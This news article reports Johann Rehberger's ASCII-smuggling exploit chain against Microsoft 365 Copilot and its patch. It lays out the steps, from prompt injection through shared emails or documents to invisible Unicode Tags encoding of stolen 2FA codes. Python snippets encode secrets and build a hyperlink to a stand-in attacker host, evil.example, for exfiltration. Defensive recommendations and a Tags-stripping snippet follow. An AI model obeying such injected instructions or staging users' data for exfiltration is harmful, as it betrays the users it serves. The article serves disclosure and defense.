Microsoft has patched a flaw in Microsoft 365 Copilot that could be exploited to steal sensitive user information. The attack method, termed ASCII smuggling, abused the flaw to exfiltrate users’ personal data.
ASCII smuggling is a technique that uses special Unicode characters which mirror ASCII but are invisible in the user interface. The attack results in sensitive data from emails, such as two-factor authentication codes, being sent to an attacker-controlled server. Following responsible disclosure in January 2024, Microsoft patched the vulnerability.
Security researcher Johann Rehberger said in a report, “This means that an attacker can have the [large language model] render, to the user, invisible data, and embed them within clickable hyperlinks. This technique stages the data for exfiltration!”
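To make the mechanics concrete, here is a minimal sketch of the encoding step in Python, assuming the Unicode Tags block (U+E0000 to U+E007F), whose code points mirror printable ASCII but render as nothing in most user interfaces. The helper names and the sample secret are illustrative, not taken from Rehberger’s proof of concept:

```python
TAG_BASE = 0xE0000  # start of the Unicode Tags block, which mirrors ASCII

def smuggle(text: str) -> str:
    """Map printable ASCII onto its invisible Unicode Tags counterparts."""
    return "".join(chr(TAG_BASE + ord(c)) for c in text if 0x20 <= ord(c) < 0x7F)

def unsmuggle(hidden: str) -> str:
    """Recover the original ASCII from a Tags-encoded string."""
    return "".join(
        chr(ord(c) - TAG_BASE)
        for c in hidden
        if TAG_BASE <= ord(c) < TAG_BASE + 0x80
    )

secret = "2FA code: 481516"          # illustrative sensitive data
payload = smuggle(secret)            # invisible when rendered in a UI
print("Click to confirm" + payload)  # looks like plain text on screen
print(unsmuggle(payload))            # recovers "2FA code: 481516"
```

Because Tags characters carry no visible glyphs, a response containing them looks identical to the benign text around it, which is what lets the model render invisible data to the user.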
The method strings together multiple attack techniques to create an effective exploit chain. The steps are as follows:
- Prompt injection via documents or emails shared in the chat that carry hidden malicious instructions.
- Utilising the prompt injection payload to instruct Copilot to search for additional emails and documents containing sensitive data.
- Using ASCII smuggling to encode the retrieved data invisibly, staging it for exfiltration without the user noticing.
- Rendering clickable hyperlinks, including website and mailto links, that point to adversary-controlled domains (a sketch of this staging step follows the list).
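That staging step might look like the following sketch, which re-declares the smuggle() helper from above; the domain evil.example and the query parameter are hypothetical stand-ins for attacker-controlled infrastructure:

```python
TAG_BASE = 0xE0000  # Unicode Tags block, as in the earlier sketch

def smuggle(text: str) -> str:
    """Encode printable ASCII as invisible Unicode Tags characters."""
    return "".join(chr(TAG_BASE + ord(c)) for c in text if 0x20 <= ord(c) < 0x7F)

def stage_exfil(anchor_text: str, secret: str) -> str:
    """Build a Markdown hyperlink whose href smuggles the hidden payload."""
    hidden = smuggle(secret)  # shows nothing when rendered
    # Hypothetical attacker endpoint: clicking the link transmits the
    # (percent-encoded) Tags characters to the server in the query string.
    return f"[{anchor_text}](https://evil.example/log?d={hidden})"

print(stage_exfil("Confirm your meeting", "2FA code: 481516"))
# Renders as an ordinary, innocuous-looking link; the payload is unseen.
```

The same idea extends to mailto links, where the smuggled characters can ride along in the address or subject.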
The patch comes after proof-of-concept attacks were demonstrated against Microsoft’s Copilot system to manipulate responses, extract private information, and evade security measures. The methods, previously discussed by Zenity, enable indirect prompt injection and retrieval-augmented generation (RAG) poisoning, which could lead to remote code execution granting full control over Microsoft Copilot and other AI apps.
The company received the following recommendations from Rehberger to mitigate the issue:
- Halting the interpretation and rendering of Unicode Tags code points (see the sketch after this list).
- Avoiding the rendering of clickable hyperlinks, as they enable phishing, scams, and data exfiltration.
- Treating automatic tool invocation as a risk until prompt injection has reliable fixes, since an injected prompt can pull sensitive information into the prompt context and execute actions via tools.
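A minimal sketch of the first recommendation, assuming model output is scrubbed before rendering; the helper names are illustrative:

```python
TAGS_START, TAGS_END = 0xE0000, 0xE007F  # the Unicode Tags block

def contains_smuggled(text: str) -> bool:
    """Flag output that carries invisible Tags code points."""
    return any(TAGS_START <= ord(c) <= TAGS_END for c in text)

def strip_tag_codepoints(text: str) -> str:
    """Drop Tags code points so hidden payloads never reach the UI."""
    return "".join(c for c in text if not TAGS_START <= ord(c) <= TAGS_END)

reply = "All set!" + "".join(chr(0xE0000 + ord(c)) for c in "secret")
assert contains_smuggled(reply)
print(strip_tag_codepoints(reply))  # "All set!" with the payload removed
```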
In short, the mitigations require that tools not be invoked automatically and that hidden characters and hyperlinks not be rendered. Microsoft stated that publicly exposed Copilot bots built with Microsoft Copilot Studio that lack authentication protections are at risk of personal data theft, assuming the threat actor knows the Copilot’s name or URL.
While it is unclear exactly how the flaw was fixed, Rehberger said that the exploits he built and shared with Microsoft in January and February no longer work, and links are no longer rendered, though the underlying prompt injection remains possible.
In the News: Amazon to unveil new Alexa in October at $10 per month subscription